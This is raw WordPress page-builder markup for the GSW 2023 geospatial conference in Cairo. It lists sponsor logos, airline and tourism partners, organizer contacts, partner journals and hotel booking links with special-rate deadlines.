css=\".vc_custom_1688951584642{margin-top: 45px !important;}\"]<span style=\"font-size: 8pt;\"><a href=\"https://www.tasa.org.tw/index.php?ln=en\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4089 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/logo_en_tasa2-300x63.png\" alt=\"\" width=\"300\" height=\"63\" /></a></span>[/vc_column_text][vc_column_text css=\".vc_custom_1688951717998{margin-top: 90px !important;}\"]<a href=\"https://www.agisoft.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4987 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/image-300x102.png\" alt=\"\" width=\"300\" height=\"102\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687095881067{margin-top: 20px !important;}\"]<a href=\"https://www.microengineering.ca \" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4560 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/05/Artboard-1-300x83.png\" alt=\"\" width=\"300\" height=\"83\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690459872519{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><a href=\"https://www.piesat.cn/en-us/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-5053\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/5X5cm-PIESAT-Logo-300x300.png\" alt=\"\" width=\"276\" height=\"276\" /></a></p>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690460056235{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><strong>Silver Sponsors</strong></span></h4>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><a href=\"https://www.vexcel-imaging.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-4990 \" src=\"https://gsw2023.com/wp-content/uploads/2023/07/image002.jpg\" alt=\"\" width=\"179\" height=\"213\" /></a></p>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1688951105389{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><a href=\"https://terrasolid.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-4655 \" src=\"https://gsw2023.com/wp-content/uploads/2023/06/Terrasolid_logo_wide2_rgb_300dpi-300x112.png\" alt=\"\" width=\"324\" height=\"121\" /><br />\n</a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096291206{margin-top: 50px !important;}\"]<a href=\"https://www.geosat.com.tw\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4041 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Geosat-logo-300x170.jpg\" alt=\"\" width=\"300\" height=\"170\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096367037{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><strong>Bronze Sponsors</strong></h4>\n<p><a href=\"https://www.riegl.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3997 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Logo_Schriftzug_rgb_R-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096532104{margin-top: 88px !important;}\"]<a href=\"https://www.robotlab.com.tw\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4033 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Xiang-Cheng-electronic-Logo-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690251276274{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Official Airline</span></h4>\n<p><a href=\"https://bit.ly/3HLQBrB\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4495 \" src=\"https://gsw2023.com/wp-content/uploads/2023/05/egyptair-e1690251327743-300x167.png\" alt=\"\" width=\"309\" height=\"172\" /></a></p>\n<p style=\"text-align: center;\">Egypt Air will offer 20% Discount on tickets for the Conference Participants.</p>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fegyptair%2F|title:EGYPTAIR\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1687571509167{margin-top: -90px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]For EGYPTAIR Booking More Detail[/dt_default_button][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690452445334{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Tourism partner</span></h4>\n<h4 style=\"text-align: center;\"><a href=\"https://funtrip-travel.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-5041\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/LOGO-FINAL2-300x184.jpg\" alt=\"\" width=\"265\" height=\"163\" /></a></h4>\n<p style=\"text-align: center;\">Email : <span style=\"color: #3366ff;\"><strong>gsw2023@funtrip-travel.com</strong></span></p>\n<p style=\"text-align: center;\">Mobile no and WhatsApp: <span style=\"color: #3366ff;\"><strong>+201221541515</strong></span></p>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Ffuntrip-travel.com%2F|title:FunTrip|target:_blank\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1690452582489{margin-top: -15px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]For FunTrip More Detail[/dt_default_button][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690600884765{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Exhibition organizer</span></h4>\n<h4 style=\"text-align: center;\"><a href=\"https://www.purespot.org/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-5061\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/Logo-Pure-2-300x300.jpg\" alt=\"\" width=\"151\" height=\"151\" /></a></h4>\n<p style=\"text-align: left;\"><span style=\"font-size: 8pt; color: #3366ff;\"><strong>project manager </strong></span><br />\n<span style=\"font-size: 8pt;\"><strong>Mr. Omar Mohamed</strong></span><br />\n<span style=\"font-size: 8pt;\">Email: omar.mohamed@egypure.org   </span><span style=\"font-size: 8pt;\"> phone : ⁦+20 100 098 8976⁩</span></p>\n<p style=\"text-align: left;\"><span style=\"font-size: 8pt;\"><strong>Mr. Ahmed Refaat</strong></span><br />\n<span style=\"font-size: 8pt;\">Email: ahmed.refaat@egypure.org   </span><span style=\"font-size: 8pt;\">  phone :⁦+20 100 084 4792</span>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fegyptair%2F|title:EGYPTAIR\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1687571509167{margin-top: -90px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]For EGYPTAIR Booking More Detail[/dt_default_button][vc_separator style=\"shadow\" border_width=\"10\"][vc_column_text css=\".vc_custom_1691508515384{margin-top: 50px !important;}\"]</p>\n<h1 style=\"text-align: center;\">Journals partner</h1>\n<h3 style=\"text-align: center;\">The author has the opportunity to publish his/her articles in one of the following journals :</h3>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><span style=\"color: #000000;\"><a style=\"color: #000000;\" href=\"https://www.springer.com/journal/43995/\"><span style=\"font-size: 14pt;\"><strong>Journal of Umm Al-Qura University for Engineering and Architecture</strong></span></a></span></p>\n<p style=\"text-align: center;\"><span style=\"font-size: 14pt;\"><strong><a href=\"http://www.springer.com/journal/43995\">www.springer.com/journal/43995</a></strong></span></p>\n<h3></h3>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><span style=\"font-size: 14pt; color: #000000;\"><strong>Journal of Engineering and Thermal Sciences (JETS) ISSN (Online) 2669-2465</strong></span></p>\n<p style=\"text-align: center;\"><strong><span style=\"font-size: 14pt;\"><a href=\"http://www.extrica.com/journal/jets\">www.extrica.com/journal/jets</a></span></strong></p>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row css=\".vc_custom_1692141209167{margin-top: -70px !important;}\"][vc_column css=\".vc_custom_1680403783341{margin-top: -15px !important;}\"][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096091997{margin-top: 125px !important;}\"]</p>\n<h6><a href=\"https://www.bdstar.com/en/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3987\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/BDStar-1024x223.png\" alt=\"\" width=\"317\" height=\"69\" /></a></h6>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096010128{margin-top: 50px !important;}\"]</p>\n<h3 style=\"text-align: center;\"><strong>Gold Sponsors</strong></h3>\n<p><span style=\"font-size: 8pt;\"><a href=\"https://hdmap.geomatics.ncku.edu.tw/index-US.php\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3989\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/LOGO-of-HDP-center-final0730-1-1024x351.png\" alt=\"\" width=\"350\" height=\"120\" /></a></span>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687095942758{margin-top: 137px !important;}\"]<a href=\"https://www.applanix.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3988\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Applanix_CYMK_OUTLINES_Horizontal_Blue-1024x129.jpg\" alt=\"\" width=\"451\" height=\"57\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687219836213{margin-top: -px !important;}\"]<a href=\"https://leica-geosystems.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4701 \" src=\"https://gsw2023.com/wp-content/uploads/2023/06/hexagon_new-300x122.jpg\" alt=\"\" width=\"349\" height=\"142\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1688951584642{margin-top: 45px !important;}\"]<span style=\"font-size: 8pt;\"><a href=\"https://www.tasa.org.tw/index.php?ln=en\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4089 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/logo_en_tasa2-300x63.png\" alt=\"\" width=\"300\" height=\"63\" /></a></span>[/vc_column_text][vc_column_text css=\".vc_custom_1688951717998{margin-top: 90px !important;}\"]<a href=\"https://www.agisoft.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4987 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/image-300x102.png\" alt=\"\" width=\"300\" height=\"102\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687095881067{margin-top: 20px !important;}\"]<a href=\"https://www.microengineering.ca \" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4560 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/05/Artboard-1-300x83.png\" alt=\"\" width=\"300\" height=\"83\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690459872519{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><a href=\"https://www.piesat.cn/en-us/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-5053\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/5X5cm-PIESAT-Logo-300x300.png\" alt=\"\" width=\"276\" height=\"276\" /></a></p>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690460056235{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><strong>Silver Sponsors</strong></span></h4>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><a href=\"https://www.vexcel-imaging.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-4990 \" src=\"https://gsw2023.com/wp-content/uploads/2023/07/image002.jpg\" alt=\"\" width=\"179\" height=\"213\" /></a></p>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1688951105389{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><a href=\"https://terrasolid.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-4655 \" src=\"https://gsw2023.com/wp-content/uploads/2023/06/Terrasolid_logo_wide2_rgb_300dpi-300x112.png\" alt=\"\" width=\"324\" height=\"121\" /><br />\n</a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096291206{margin-top: 50px !important;}\"]<a href=\"https://www.geosat.com.tw\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4041 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Geosat-logo-300x170.jpg\" alt=\"\" width=\"300\" height=\"170\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096367037{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><strong>Bronze Sponsors</strong></h4>\n<p><a href=\"https://www.riegl.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3997 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Logo_Schriftzug_rgb_R-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096532104{margin-top: 88px !important;}\"]<a href=\"https://www.robotlab.com.tw\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4033 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Xiang-Cheng-electronic-Logo-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690251276274{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Official Airline</span></h4>\n<p><a href=\"https://bit.ly/3HLQBrB\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4495 \" src=\"https://gsw2023.com/wp-content/uploads/2023/05/egyptair-e1690251327743-300x167.png\" alt=\"\" width=\"309\" height=\"172\" /></a></p>\n<p style=\"text-align: center;\">Egypt Air will offer 20% Discount on tickets for the Conference Participants.</p>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fegyptair%2F|title:EGYPTAIR\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1687571509167{margin-top: -90px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]For EGYPTAIR Booking More Detail[/dt_default_button][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690452445334{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Tourism partner</span></h4>\n<h4 style=\"text-align: center;\"><a href=\"https://funtrip-travel.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-5041\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/LOGO-FINAL2-300x184.jpg\" alt=\"\" width=\"265\" height=\"163\" /></a></h4>\n<p style=\"text-align: center;\">Email : <span style=\"color: #3366ff;\"><strong>gsw2023@funtrip-travel.com</strong></span></p>\n<p style=\"text-align: center;\">Mobile no and WhatsApp: <span style=\"color: #3366ff;\"><strong>+201221541515</strong></span></p>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Ffuntrip-travel.com%2F|title:FunTrip|target:_blank\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1690452582489{margin-top: -15px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]For FunTrip More Detail[/dt_default_button][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690600884765{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Exhibition organizer</span></h4>\n<h4 style=\"text-align: center;\"><a href=\"https://www.purespot.org/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-5061\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/Logo-Pure-2-300x300.jpg\" alt=\"\" width=\"151\" height=\"151\" /></a></h4>\n<p style=\"text-align: left;\"><span style=\"font-size: 8pt; color: #3366ff;\"><strong>project manager </strong></span><br />\n<span style=\"font-size: 8pt;\"><strong>Mr. Omar Mohamed</strong></span><br />\n<span style=\"font-size: 8pt;\">Email: omar.mohamed@egypure.org   </span><span style=\"font-size: 8pt;\"> phone : ⁦+20 100 098 8976⁩</span></p>\n<p style=\"text-align: left;\"><span style=\"font-size: 8pt;\"><strong>Mr. Ahmed Refaat</strong></span><br />\n<span style=\"font-size: 8pt;\">Email: ahmed.refaat@egypure.org   </span><span style=\"font-size: 8pt;\">  phone :⁦+20 100 084 4792</span>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fegyptair%2F|title:EGYPTAIR\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1687571509167{margin-top: -90px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]For EGYPTAIR Booking More Detail[/dt_default_button][vc_separator style=\"shadow\" border_width=\"10\"][vc_column_text css=\".vc_custom_1691508515384{margin-top: 50px !important;}\"]</p>\n<h1 style=\"text-align: center;\">Journals partner</h1>\n<h3 style=\"text-align: center;\">The author has the opportunity to publish his/her articles in one of the following journals :</h3>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><span style=\"color: #000000;\"><a style=\"color: #000000;\" href=\"https://www.springer.com/journal/43995/\"><span style=\"font-size: 14pt;\"><strong>Journal of Umm Al-Qura University for Engineering and Architecture</strong></span></a></span></p>\n<p style=\"text-align: center;\"><span style=\"font-size: 14pt;\"><strong><a href=\"http://www.springer.com/journal/43995\">www.springer.com/journal/43995</a></strong></span></p>\n<h3></h3>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><span style=\"font-size: 14pt; color: #000000;\"><strong>Journal of Engineering and Thermal Sciences (JETS) ISSN (Online) 2669-2465</strong></span></p>\n<p style=\"text-align: center;\"><strong><span style=\"font-size: 14pt;\"><a href=\"http://www.extrica.com/journal/jets\">www.extrica.com/journal/jets</a></span></strong></p>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row css=\".vc_custom_1668205719738{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column css=\".vc_custom_1668010547399{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_separator style=\"shadow\" border_width=\"10\"][vc_column_text css=\".vc_custom_1687848604610{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 10px !important;}\"]</p>\n<h2 style=\"color: #311b92; text-align: center;\"><strong> EGYPT GSW\'2023</strong></h2>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row content_placement=\"top\" css=\".vc_custom_1687710509489{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column width=\"1/3\" css=\".vc_custom_1687711699560{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_text css=\".vc_custom_1687711558584{margin-top: 0px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"]</p>\n<p style=\"text-align: justify;\">As we celebrate our 50th anniversary, the Arab Academy for Science, Technology, and Maritime Transport (AASTMT) is honored to host the ISPRS first Geospatial Week in Africa and Middle East in 2023 (GSW-2023) that will be held under the auspices of H.E Secretary-General of the League of Arab States. The conference will be held in September 2023, at the InterContinental Cairo Semiramis Cairo, Egypt. AASTMT strongly believes that science is the key to the future and the cornerstone for nations\' progress and prosperity. <a href=\"https://gsw2023.com/index.php/welcome/\"><span style=\"text-decoration: underline;\"><strong><span style=\"color: #3366ff; text-decoration: underline;\">Read More</span></strong></span></a></p>\n<p>[/vc_column_text][/vc_column][vc_column width=\"2/3\" css=\".vc_custom_1668010506951{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][dt_team_masonry order=\"asc\" custom_content_bg_color=\"#e8e8e8\" image_sizing=\"proportional\" img_max_width=\"120px\" image_paddings=\"10px 0px 0px 0px\" img_border_radius=\"10px\" post_title_bottom_margin=\"0px\" team_position_bottom_margin=\"0px\" read_more_button=\"off\" soc_icon_border_width=\"0px\" soc_icon_color=\"#ffffff\" posts_offset=\"0\" category=\"105\" css_dt_team_masonry=\".vc_custom_1687711659617{margin-top: 0px !important;}\"][/vc_column][/vc_row][vc_row bg_type=\"image\" parallax_style=\"vcpb-animated\" bg_image_new=\"id^3283|url^https://gsw2023.com/wp-content/uploads/2022/11/1664433062169.jpg|caption^null|alt^null|title^1664433062169|description^null\" animation_direction=\"top-animation\" bg_override=\"ex-full\" fadeout_row=\"fadeout_row_value\" enable_overlay=\"enable_overlay_value\" overlay_color=\"#3a3a3a\" overlay_pattern=\"transperant\" overlay_pattern_opacity=\"75\"][vc_column width=\"1/3\"][vc_column_text css=\".vc_custom_1687564704480{margin-top: -4px !important;margin-left: -50px !important;border-left-width: -50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"color: #000000; padding: 5px; background-color: rgba(255,255,255, 0.7); font-size: 14pt;\">InterContinental Cairo Semiramis</span></h4>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\"><img class=\" wp-image-3289 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2022/11/282192719-300x169.jpg\" alt=\"\" width=\"298\" height=\"168\" /></span></h4>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\">Conference Venue </span></h4>\n<p>&nbsp;</p>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\">Special Rate Booking is Opened Now</span></h4>\n<h5></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Deadline for the Special Rates is August 10, 2023</span></h5>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fwww.ihg.com%2Fredirect%3Fpath%3Dasearch%26brandCode%3D6C%26localeCode%3Den%26regionCode%3D1%26hotelCode%3DCROHA%26checkInDate%3D01%26checkInMonthYear%3D082023%26checkOutDate%3D08%26checkOutMonthYear%3D082023%26rateCode%3DAAFST%26_PMID%3D99801505%26GPC%3DARA%26cn%3Dno%26viewfullsite%3Dtrue|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1690569939761{margin-top: -25px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: -50px !important;}\"]BOOK NOW[/dt_default_button][/vc_column][vc_column width=\"1/3\" awb_type=\"image\"][vc_column_text css=\".vc_custom_1687553105001{margin-top: 0px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt; color: #000000; padding: 5px; background-color: rgba(255,255,255, 0.7);\">Ramses Hilton hotel</span></h4>\n<h4></h4>\n<p><img class=\"aligncenter\" src=\"https://www.hilton.com/im/en/CAIRHTW/16763081/exterior-night-shot.jpg?impolicy=crop&amp;cw=4849&amp;ch=3334&amp;gravity=NorthWest&amp;xposition=75&amp;yposition=0&amp;rw=320&amp;rh=220\" alt=\"Hotel Exterior at Night\" width=\"262\" height=\"180\" /></p>\n<p>&nbsp;</p>\n<h4 style=\"text-align: center;\"></h4>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><span style=\"color: #ffffff;\">Special Rate Booking is O</span><span style=\"color: #ffffff;\">pened Now</span></span></h4>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Deadline for the Special Rates is August 10, 2023</span></h5>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fwww.hilton.com%2Fen%2Fattend-my-event%2Fcairhtw-gaas23-e979b836-791b-44ea-9095-410655c177d0%2F|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1690251704410{margin-top: 10px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]BOOK NOW[/dt_default_button][vc_btn title=\"For More Hotels\" color=\"info\" align=\"center\" link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fhotel-accommodation%2F\"][/vc_column][vc_column width=\"1/3\"][vc_column_text]</p>\n<h4 class=\"qrShPb pXs6bb PZPZlf q8U8x aTI8gc EaHP9c\" style=\"text-align: center;\" data-dtype=\"d3ifr\" data-local-attribute=\"d3bn\" data-attrid=\"title\" data-ved=\"2ahUKEwi88f_AuNX_AhU5gv0HHQT_D7wQ3B0oAHoECDsQAQ\"><span style=\"color: #000000; padding: 5px; background-color: rgba(255,255,255, 0.7); font-size: 18pt;\">Flamenco Cairo Hotel</span></h4>\n<h4></h4>\n<p><a href=\"https://www.flamencohotels.com/web/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter\" src=\"https://www.flamencohotels.com/web/wp-content/uploads/2020/02/4Z4A4470-Low.jpg\" alt=\"\" width=\"281\" height=\"187\" /></a></p>\n<p>&nbsp;</p>\n<h4 style=\"text-align: center;\"></h4>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><span style=\"color: #ffffff;\">Special Rate Booking is O</span><span style=\"color: #ffffff;\">pened Now</span></span></h4>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Deadline for the Special Rates is September 1, 2023</span></h5>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fflamenco-cairo-hotel%2F|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1687391423079{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]BOOK NOW[/dt_default_button][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_single_image image=\"3103\" img_size=\"120x120\" alignment=\"center\" css=\".vc_custom_1687570749968{margin-top: 12px !important;border-top-width: 0px !important;padding-top: 